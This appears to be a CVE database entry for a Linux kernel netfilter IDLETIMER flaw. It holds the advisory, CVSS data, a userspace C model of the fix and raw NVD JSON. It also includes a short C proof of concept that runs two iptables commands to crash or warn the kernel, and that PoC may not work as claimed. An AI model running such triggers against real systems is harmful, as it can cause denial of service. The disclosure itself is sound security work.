Security Vulnerability Report
CVE-2026-23274 CVSS 7.8 HIGH

Published: 2026-03-20 09:16:13
Last Modified: 2026-04-18 09:16:16
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

netfilter: xt_IDLETIMER: reject rev0 reuse of ALARM timer labels

IDLETIMER revision 0 rules reuse existing timers by label and always call mod_timer() on timer->timer.

If the label was created first by revision 1 with XT_IDLETIMER_ALARM, the object uses alarm timer semantics and timer->timer is never initialized. Reusing that object from revision 0 causes mod_timer() on an uninitialized timer_list, triggering debugobjects warnings and possible panic when panic_on_warn=1.

Fix this by rejecting revision 0 rule insertion when an existing timer with the same label is of ALARM type.
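The state mismatch and the guard described above can be modelled in userspace. This is an added example, not the kernel's code or the fix commit: the struct, the function names, the MODEL_* constants and the numeric value of XT_IDLETIMER_ALARM are assumptions, and only the revision 0 reuse path is modelled.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define XT_IDLETIMER_ALARM 0x01      /* flag named in the description; value assumed */
#define MODEL_UNINIT_TIMER_USE 1     /* hypothetical marker: mod_timer() on unset timer_list */
#define MODEL_MAX 8

struct model_timer {                 /* stand-in for the per-label kernel object */
    char label[32];
    unsigned char timer_type;        /* XT_IDLETIMER_ALARM => alarm timer semantics */
    bool timer_list_ready;           /* models whether timer->timer was initialized */
    unsigned int refcnt;
};

static struct model_timer timers[MODEL_MAX];
static unsigned int ntimers;

void model_reset(void) { ntimers = 0; }

static struct model_timer *find_by_label(const char *label)
{
    for (unsigned int i = 0; i < ntimers; i++)
        if (strcmp(timers[i].label, label) == 0)
            return &timers[i];
    return NULL;
}

/* Create or reuse a label. ALARM objects never get their timer_list set up. */
static int insert(const char *label, unsigned char type, bool rev0, bool patched)
{
    struct model_timer *t = find_by_label(label);
    if (!t) {
        if (ntimers == MODEL_MAX)
            return -ENOMEM;
        t = &timers[ntimers++];
        snprintf(t->label, sizeof(t->label), "%s", label);
        t->timer_type = type;
        t->timer_list_ready = !(type & XT_IDLETIMER_ALARM);
        t->refcnt = 0;
    } else if (rev0 && patched && (t->timer_type & XT_IDLETIMER_ALARM)) {
        return -EINVAL;              /* the fix: refuse rev0 reuse of an ALARM label */
    }
    t->refcnt++;
    if (rev0 && !t->timer_list_ready)
        return MODEL_UNINIT_TIMER_USE; /* pre-fix path reaches the uninitialized timer */
    return 0;
}

int model_rev1_insert(const char *label, unsigned char type) { return insert(label, type, false, true); }
int model_rev0_insert(const char *label, bool patched) { return insert(label, 0, true, patched); }
```

With `patched` set, the rejection happens before the reference count is taken, so the ALARM object is left untouched by the refused rule.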

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (versions prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-23274
 * Trigger: Reuse an ALARM timer label with a non-ALARM (rev0) timer.
 * Effect: Kernel panic or debug_object warning.
 */
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    // Step 1: Create a revision 1 ALARM timer
    printf("[*] Creating ALARM timer (rev1) with label 'vuln_label'...\n");
    system("iptables -A OUTPUT -j IDLETIMER --timeout 5 --label vuln_label --alarm");

    // Step 2: Attempt to create a revision 0 timer with the same label
    // This triggers mod_timer on uninitialized memory in vulnerable kernels.
    printf("[*] Creating standard timer (rev0) with label 'vuln_label'...\n");
    system("iptables -A OUTPUT -j IDLETIMER --timeout 10 --label vuln_label");

    printf("[+] Exploit triggered. Check kernel logs for panic/warning.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23274", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-20T09:16:13.077", "lastModified": "2026-04-18T09:16:15.797", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: xt_IDLETIMER: reject rev0 reuse of ALARM timer labels\n\nIDLETIMER revision 0 rules reuse existing timers by label and always call\nmod_timer() on timer->timer.\n\nIf the label was created first by revision 1 with XT_IDLETIMER_ALARM,\nthe object uses alarm timer semantics and timer->timer is never initialized.\nReusing that object from revision 0 causes mod_timer() on an uninitialized\ntimer_list, triggering debugobjects warnings and possible panic when\npanic_on_warn=1.\n\nFix this by rejecting revision 0 rule insertion when an existing timer with\nthe same label is of ALARM type."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnetfilter: xt_IDLETIMER: rechazar la reutilización de rev0 de etiquetas de temporizador ALARM\n\nLas reglas de la revisión 0 de IDLETIMER reutilizan temporizadores existentes por etiqueta y siempre llaman a mod_timer() en timer-&gt;timer.\n\nSi la etiqueta fue creada primero por la revisión 1 con XT_IDLETIMER_ALARM, el objeto utiliza semántica de temporizador de alarma y timer-&gt;timer nunca se inicializa. 
Reutilizar ese objeto de la revisión 0 causa mod_timer() en una timer_list no inicializada, lo que activa advertencias de debugobjects y un posible pánico cuando panic_on_warn=1.\n\nSolucione esto rechazando la inserción de reglas de la revisión 0 cuando un temporizador existente con la misma etiqueta es de tipo ALARM."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/144f88054ba0180467356f40895bd660b5dceeec", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/28c7cfaf0c0ab17cbd7754092116fd1af45271f9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/32e937dc6e97f5ed3cdfe3fc0b2b19a05e23fa44", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/54080355999381fed4a26129579a5765bab87491", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5e7ece24c5cb75a60402aad4d803c7898ea40aa9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f228b9ae2a7e84d1153616d8e71c4236cb1f1309", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f5ef97c13165542480a6ffdbe6f09f40bbb7cbf1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}